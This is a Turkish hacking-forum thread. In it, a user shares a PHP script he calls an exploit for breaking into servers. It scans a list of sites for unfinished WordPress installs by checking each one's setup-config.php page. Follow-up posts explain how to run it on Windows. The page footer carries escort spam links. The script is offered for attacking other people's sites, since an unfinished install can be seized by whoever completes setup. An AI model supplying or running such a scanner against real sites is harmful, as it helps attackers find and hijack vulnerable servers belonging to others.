WPinstall Exploit [Wordpress Kurulmamış Siteleri Tarar]

N

Nihilist

Yeni Üye
Katılım
21 Şub 2016
Mesajlar
19
Tepkime puanı
0
Puanları
0
Uzun zaman önce sunuculara sızmak için kodladığım bir exploittir. Pek çok defa işime yaradı. Sizlerle de paylaşayım dedim. Bol hackler :)

Kullanim:
php wpinstall.php sitelistesi.txt

x829s2ye.png

4qw4tcik.png

r9278cuz.png


PHP: 
<?php
echo "\r\n";
echo '##	Coded By Nihilist';
echo "\r\n";
echo '##	Ajanlar.ORG';
echo "\r\n";
echo "\r\n";
set_time_limit(0);
error_reporting(0);

if (isset($argv[1]))
{
	$oku = file_get_contents($argv[1]);
	$ayir = split("\r\n",$oku);
	foreach($ayir as $siteler)
	{
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $siteler."/wp-admin/setup-config.php");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
		curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
		$icerik = curl_exec($ch);
		curl_close($ch);
		if (strstr($icerik,'setup-config.php?step=1'))
		{
			echo $siteler." --> Var :)\r\n";
		}
		else
		{
			
		}

	}

}
else{
	echo 'Ornek: php wpinstall.php sitelistesi.txt';
}





?>
 
BH80

BH80

Yeni Üye
Katılım
10 Ara 2015
Mesajlar
97
Tepkime puanı
0
Puanları
0
Bunu cmd ilemi çalıştırıyoruz yoksa sunucuyamı atıyoruz ?
 
N

Nihilist

Yeni Üye
Katılım
21 Şub 2016
Mesajlar
19
Tepkime puanı
0
Puanları
0
BH80' Alıntı:
Bunu cmd ilemi çalıştırıyoruz yoksa sunucuyamı atıyoruz ?
Genişletmek için tıkla ...

Bu bir php exploittir. Herhangi bir php derleyici ile kullanılabilir. Appserv adlı programı öneririm.

Appserv programını yükledikten sonra exploiti herhangi bir yere atacaksın.
Mesela c:\ içine at.



Sonra cmdye girip aşağıdaki komutu gireceksin:

cd c:\

ardından

php wpinstall.php sitelistesi.txt

komutunu gireceksin.


Tabi ki önce sitelistesi.txt içine taranacak tüm siteleri atacaksın.
 
BH80

BH80

Yeni Üye
Katılım
10 Ara 2015
Mesajlar
97
Tepkime puanı
0
Puanları
0
appserv kurdum exploitleride dediğin gibi C:/ attım ancak komutu verince böyle oluyor sıkıntı ne ?



Wkndpm.png
 
N

Nihilist

Yeni Üye
Katılım
21 Şub 2016
Mesajlar
19
Tepkime puanı
0
Puanları
0
BH80' Alıntı:
appserv kurdum exploitleride dediğin gibi C:/ attım ancak komutu verince böyle oluyor sıkıntı ne ?



Wkndpm.png
Genişletmek için tıkla ...


Php tanımlaması yapılmamış. Sen exploiti
C:\AppServ\php5 içerisinde çalıştır. Sorun hallolacaktır.
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012